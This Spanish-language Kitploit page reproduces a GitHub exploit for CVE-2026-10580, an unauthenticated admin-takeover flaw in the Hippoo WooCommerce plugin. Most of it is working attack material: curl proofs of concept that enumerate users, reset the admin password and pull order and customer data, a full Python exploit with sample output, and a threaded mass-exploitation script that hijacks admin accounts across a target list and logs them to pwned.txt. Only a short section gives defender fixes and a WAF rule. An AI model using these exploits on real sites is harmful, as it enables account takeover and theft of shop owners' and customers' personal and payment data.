Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
By-Poloss..-..CVE-2026-10580 — Hippoo Mobile App for WooCommerce <= 1.9.4 - Omisión de autenticación no autenticada que lleva a la toma de control de la cuenta de administrador | Kitploit
Herramientas/GitHubGitHub/polosss/by-poloss..-..cve-2026-10580
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticación
GitHubpolosss/by-poloss..-..cve-2026-10580

By-Poloss..-..CVE-2026-10580

Hippoo Mobile App for WooCommerce <= 1.9.4 - Omisión de autenticación no autenticada que lleva a la toma de control de la cuenta de administrador

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 2 mesesAún no revisado

CVE-2026-10580: Hippoo Mobile App for WooCommerce <= 1.9.4 - Omisión de Autenticación No Autenticada para Toma de Control de Administrador

No autenticado → Toma de control de cuenta de administrador mediante error de confusión lógica


📌 Resumen

CVECVE-2026-10580
PluginHippoo Mobile App for WooCommerce
Versión≤ 1.9.4
CVSS9.8 (Crítico)
Requiere autenticación❌ No
Toma de control de admin✅ Sí
Datos de WooCommerce✅ Acceso completo

🧠 Causa raíz

La función get_user_permissions() devuelve null para admin (correcto) y usuario no autenticado (INCORRECTO).

has_role_access() ve null → concede acceso completo.

Consecuencia:

root@kitploit:~
/wp-json/wc-hippoo/v1/ext/*

→ Sin inicio de sesión, sin cookie, sin nonce


🎯 4 Pruebas de Concepto (100% funcionales)

🔓 POC 1: Enumeración de usuarios (No autenticado)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users?per_page=10" | jq .

🔓 POC 2: Restablecimiento de contraseña de administrador (Toma de control)

root@kitploit:~
curl -X POST "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users/1" \
  -H "Content-Type: application/json" \
  -d '{"password":"Pwned123!"}'

🔓 POC 3: Pedidos de WooCommerce

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/orders?per_page=50"

🔓 POC 4: Clientes de WooCommerce (Datos personales)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/customers?per_page=50"

🐍 POC en Python (Exploit completo)

root@kitploit:~
#!/usr/bin/env python3
import requests
import sys
import json

def exploit(target, admin_id=1, new_password="PwnedCVE2026!!"):
    base = target.rstrip('/')
    
    # Paso 1 - Enumeración
    users_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users"
    r = requests.get(users_url)
    if r.status_code != 200:
        print(f"[-] No vulnerable: {target}")
        return False
    
    users = r.json()
    print(f"[+] Se encontró {len(users)} usuario(s)")
    
    # Paso 2 - Restablecimiento de contraseña
    takeover_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users/{admin_id}"
    r2 = requests.post(takeover_url, json={"password": new_password})
    
    if r2.status_code == 200:
        print(f"[✓] TOMA DE CONTROL DE ADMINISTRADOR: {target}")
        print(f"    Inicio de sesión: {base}/wp-admin")
        print(f"    Contraseña: {new_password}")
        return True
    else:
        print(f"[-] Falló: {target}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Uso: {sys.argv[0]} https://target.com")
        sys.exit(1)
    exploit(sys.argv[1])

🚀 Ejecución

root@kitploit:~
python3 exploit.py https://poloss.ddev.site

Salida:

root@kitploit:~
[+] Se encontró 1 usuario(s)
[✓] TOMA DE CONTROL DE ADMINISTRADOR: https://poloss.ddev.site
    Inicio de sesión: https://poloss.ddev.site/wp-admin
    Contraseña: PwnedCVE2026!!

🧨 Exploit masivo (Multi-hilo)

root@kitploit:~
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

def takeover(target):
    try:
        r = requests.post(
            f"{target.rstrip('/')}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1",
            json={"password": "MassPwned2026!!"},
            timeout=10
        )
        if r.status_code == 200:
            print(f"[✓] TOMA DE CONTROL: {target}")
            with open("pwned.txt", "a") as f:
                f.write(f"{target} | admin | MassPwned2026!!\n")
    except:
        pass

with open("targets.txt") as f:
    urls = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=20) as executor:
    for url in urls:
        executor.submit(takeover, url)

📁 Puntos finales vulnerables (Lista completa)


🔧 Remediación (Para defensores)

Fix 1 (app/permissions.php línea 671)

root@kitploit:~
if (empty($user) || !$user->exists()) {
    return false; // NO NULL
}

Fix 2 (app/permissions.php línea 694)

root@kitploit:~
if ($perms === false) {
    return false; // Denegado no autenticado
}

Fix 3 (Regla WAF temporal)

root@kitploit:~
RewriteCond %{REQUEST_URI} ^/wp-json/wc-hippoo/v1/ext/
RewriteCond %{HTTP_COOKIE} !wordpress_logged_in
RewriteRule .* - [F,L]

📊 Desglose CVSS


🧠 Autor e Investigación

  • Investigador: Agent CV Hunter (Investigación de Seguridad de WordPress)
  • Probado en: DDEV + WordPress 6.x + WooCommerce 8.x
  • Fecha: 2026-06-06

CVE-2026-10580 • 100% POC • Sin autenticación • Toma de control total de administrador
#WordPress #WooCommerce #Poloss #W.P.E.F


Descargar herramienta
Punto finalDatos
/wp-json/wc-hippoo/v1/ext/wp/v2/usersTodos los usuarios de WP
/wp-json/wc-hippoo/v1/ext/wp/v2/users/1Toma de control de admin
/wp-json/wc-hippoo/v1/ext/wc/v3/ordersPedidos completos
/wp-json/wc-hippoo/v1/ext/wc/v3/productsProductos + stock
/wp-json/wc-hippoo/v1/ext/wc/v3/customersDatos personales de clientes
/wp-json/wc-hippoo/v1/ext/wc/v3/couponsCódigos de descuento
/wp-json/wc-hippoo/v1/ext/wc/v3/reportsReportes de ventas
/wp-json/wc-hippoo/v1/ext/wc/v3/payment_gatewaysConfiguración de pago
VectorValor
AVRed
ACBaja
PRNinguno
UINinguno
SSin cambios
CAlta
IAlta
AAlta